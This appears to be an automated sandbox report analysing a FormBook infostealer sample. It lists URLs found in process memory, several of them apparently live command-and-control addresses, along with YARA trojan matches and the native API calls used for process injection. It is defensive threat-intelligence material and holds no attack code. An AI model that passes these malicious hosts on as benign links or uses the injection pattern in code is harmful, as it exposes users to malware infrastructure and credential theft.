Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/r1.crt0
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: MBLUUsWuClSd.exe, 00000005.00000002.23442870422.000000000167D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.neuro-practicum.online
Source: MBLUUsWuClSd.exe, 00000005.00000002.23442870422.000000000167D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.neuro-practicum.online/dndz/
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: replace.exe, 00000004.00000003.21461468607.0000000007BF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd
Source: replace.exe, 00000004.00000002.23441797412.0000000002BE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
Source: replace.exe, 00000004.00000002.23441797412.0000000002BE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.synd.fun&rand=
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: replace.exe, 00000004.00000002.23448017177.0000000004996000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.00000000047C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://stratogent.info/f3n5/?VzK4o8Jx=dhj1q08La8WFEWo3xk5bQlyPjuL1dgahmkpS3NRsd6Y/mAIsEkGjeuU1SXWIZ
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: replace.exe, 00000004.00000002.23448017177.00000000044E0000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.0000000004310000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://whois.gandi.net/en/results?search=redlakedispensery.net
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: replace.exe, 00000004.00000002.23450630136.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, replace.exe, 00000004.00000002.23448017177.00000000044E0000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.0000000004310000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.gandi.net/en/domain
Source: replace.exe, 00000004.00000002.23450630136.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, replace.exe, 00000004.00000002.23448017177.0000000004672000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.00000000044A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_server&
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_new&am
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_host&
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_cms&amp
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.synd.fun&utm_medium=parking&utm_campaig
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.synd.fun&reg_source=parking_auto
Source: MBLUUsWuClSd.exe, 00000005.00000002.23446027884.0000000003B36000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.strato.de

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.SOA SIL TL382920.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SOA SIL TL382920.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.23445436246.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.23442870422.0000000001620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.21337354866.0000000006A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.23445613909.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.SOA SIL TL382920.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.SOA SIL TL382920.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.23445436246.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.23442870422.0000000001620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.21337354866.0000000006A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.23445613909.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0042C303 NtClose,	2_2_0042C303
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018734E0 NtCreateMutant,LdrInitializeThunk,	2_2_018734E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872B90 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_01872B90
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872BC0 NtQueryInformationToken,LdrInitializeThunk,	2_2_01872BC0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872A80 NtClose,LdrInitializeThunk,	2_2_01872A80
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872D10 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01872D10
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872EB0 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_01872EB0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01874260 NtSetContextThread,	2_2_01874260
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01874570 NtSuspendThread,	2_2_01874570
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018729D0 NtWaitForSingleObject,	2_2_018729D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018729F0 NtReadFile,	2_2_018729F0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018738D0 NtGetContextThread,	2_2_018738D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872B80 NtCreateKey,	2_2_01872B80
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872BE0 NtQueryVirtualMemory,	2_2_01872BE0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872B00 NtQueryValueKey,	2_2_01872B00
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872B10 NtAllocateVirtualMemory,	2_2_01872B10
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872B20 NtQueryInformationProcess,	2_2_01872B20
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872AA0 NtQueryInformationFile,	2_2_01872AA0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872AC0 NtEnumerateValueKey,	2_2_01872AC0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872A10 NtWriteFile,	2_2_01872A10
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D4260 NtSetContextThread,LdrInitializeThunk,	4_2_031D4260
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D4570 NtSuspendThread,LdrInitializeThunk,	4_2_031D4570
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D34E0 NtCreateMutant,LdrInitializeThunk,	4_2_031D34E0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_031D2B10
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2B00 NtQueryValueKey,LdrInitializeThunk,	4_2_031D2B00
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2B90 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_031D2B90
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2B80 NtCreateKey,LdrInitializeThunk,	4_2_031D2B80
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2BC0 NtQueryInformationToken,LdrInitializeThunk,	4_2_031D2BC0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2A10 NtWriteFile,LdrInitializeThunk,	4_2_031D2A10
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2A80 NtClose,LdrInitializeThunk,	4_2_031D2A80
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2AC0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_031D2AC0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D29F0 NtReadFile,LdrInitializeThunk,	4_2_031D29F0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D38D0 NtGetContextThread,LdrInitializeThunk,	4_2_031D38D0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2F00 NtCreateFile,LdrInitializeThunk,	4_2_031D2F00
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2E00 NtQueueApcThread,LdrInitializeThunk,	4_2_031D2E00
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2E50 NtCreateSection,LdrInitializeThunk,	4_2_031D2E50
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2ED0 NtResumeThread,LdrInitializeThunk,	4_2_031D2ED0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2D10 NtQuerySystemInformation,LdrInitializeThunk,	4_2_031D2D10
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2DA0 NtReadVirtualMemory,LdrInitializeThunk,	4_2_031D2DA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2C30 NtMapViewOfSection,LdrInitializeThunk,	4_2_031D2C30
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2C50 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_031D2C50
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2CF0 NtDelayExecution,LdrInitializeThunk,	4_2_031D2CF0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2B20 NtQueryInformationProcess,	4_2_031D2B20
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2BE0 NtQueryVirtualMemory,	4_2_031D2BE0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2AA0 NtQueryInformationFile,	4_2_031D2AA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D29D0 NtWaitForSingleObject,	4_2_031D29D0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2F30 NtOpenDirectoryObject,	4_2_031D2F30
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2FB0 NtSetValueKey,	4_2_031D2FB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2E80 NtCreateProcessEx,	4_2_031D2E80
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2EB0 NtProtectVirtualMemory,	4_2_031D2EB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2EC0 NtQuerySection,	4_2_031D2EC0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2D50 NtWriteVirtualMemory,	4_2_031D2D50
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2DC0 NtAdjustPrivilegesToken,	4_2_031D2DC0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2C10 NtOpenProcess,	4_2_031D2C10
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D3C30 NtOpenProcessToken,	4_2_031D3C30
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2C20 NtSetInformationFile,	4_2_031D2C20
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D3C90 NtOpenThread,	4_2_031D3C90
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031D2CD0 NtEnumerateKey,	4_2_031D2CD0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028D9040 NtClose,	4_2_028D9040
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028D91B0 NtAllocateVirtualMemory,	4_2_028D91B0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028D8EB0 NtReadFile,	4_2_028D8EB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028D8FA0 NtDeleteFile,	4_2_028D8FA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028D8D40 NtCreateFile,	4_2_028D8D40

Detected potential crypto function

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_015704C0	1_2_015704C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_01575AF0	1_2_01575AF0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_01571111	1_2_01571111
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_0157C290	1_2_0157C290
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_0157C281	1_2_0157C281
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_0157E438	1_2_0157E438
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_0157E9A0	1_2_0157E9A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_01578B79	1_2_01578B79
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_0157DA90	1_2_0157DA90
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_0157BE58	1_2_0157BE58
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_004182E3	2_2_004182E3
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00403040	2_2_00403040
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0042E903	2_2_0042E903
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00401210	2_2_00401210
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0040FB53	2_2_0040FB53
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00402370	2_2_00402370
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_004164C3	2_2_004164C3
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0040FD73	2_2_0040FD73
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0040DDF3	2_2_0040DDF3
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018451C0	2_2_018451C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0190010E	2_2_0190010E
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DD130	2_2_018DD130
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0188717A	2_2_0188717A
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018300A0	2_2_018300A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184B0D0	2_2_0184B0D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F70F1	2_2_018F70F1
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EE076	2_2_018EE076
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01831380	2_2_01831380
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184E310	2_2_0184E310
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182D2EC	2_2_0182D2EC
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FF5C9	2_2_018FF5C9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F75C6	2_2_018F75C6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0190A526	2_2_0190A526
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840445	2_2_01840445
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F6757	2_2_018F6757
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01842760	2_2_01842760
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184A760	2_2_0184A760
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840680	2_2_01840680
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FA6C0	2_2_018FA6C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183C6E0	2_2_0183C6E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FF6F6	2_2_018FF6F6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DD62C	2_2_018DD62C
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018ED646	2_2_018ED646
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01864670	2_2_01864670
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183E9A0	2_2_0183E9A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FE9A6	2_2_018FE9A6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01856882	2_2_01856882
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018458B0	2_2_018458B0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018428C0	2_2_018428C0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F78F3	2_2_018F78F3
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01843800	2_2_01843800
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018E0835	2_2_018E0835
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01826868	2_2_01826868
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01849870	2_2_01849870
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185B870	2_2_0185B870
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FF872	2_2_018FF872
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018B4BC0	2_2_018B4BC0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840B10	2_2_01840B10
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FFB2E	2_2_018FFB2E
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FFA89	2_2_018FFA89
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FCA13	2_2_018FCA13
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031AE310	4_2_031AE310
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03191380	4_2_03191380
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03162245	4_2_03162245
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0318D2EC	4_2_0318D2EC
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0323D130	4_2_0323D130
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0326010E	4_2_0326010E
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031E717A	4_2_031E717A
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A51C0	4_2_031A51C0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0324E076	4_2_0324E076
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031900A0	4_2_031900A0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031AB0D0	4_2_031AB0D0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_032570F1	4_2_032570F1
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03256757	4_2_03256757
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A2760	4_2_031A2760
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031AA760	4_2_031AA760
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0323D62C	4_2_0323D62C
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031BC600	4_2_031BC600
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0324D646	4_2_0324D646
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031C4670	4_2_031C4670
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A0680	4_2_031A0680
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325F6F6	4_2_0325F6F6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325A6C0	4_2_0325A6C0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0319C6E0	4_2_0319C6E0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0326A526	4_2_0326A526
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_032575C6	4_2_032575C6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325F5C9	4_2_0325F5C9
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A0445	4_2_031A0445
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031A0B10	4_2_031A0B10
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325FB2E	4_2_0325FB2E
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_03214BC0	4_2_03214BC0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325CA13	4_2_0325CA13
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0325EA5B	4_2_0325EA5B
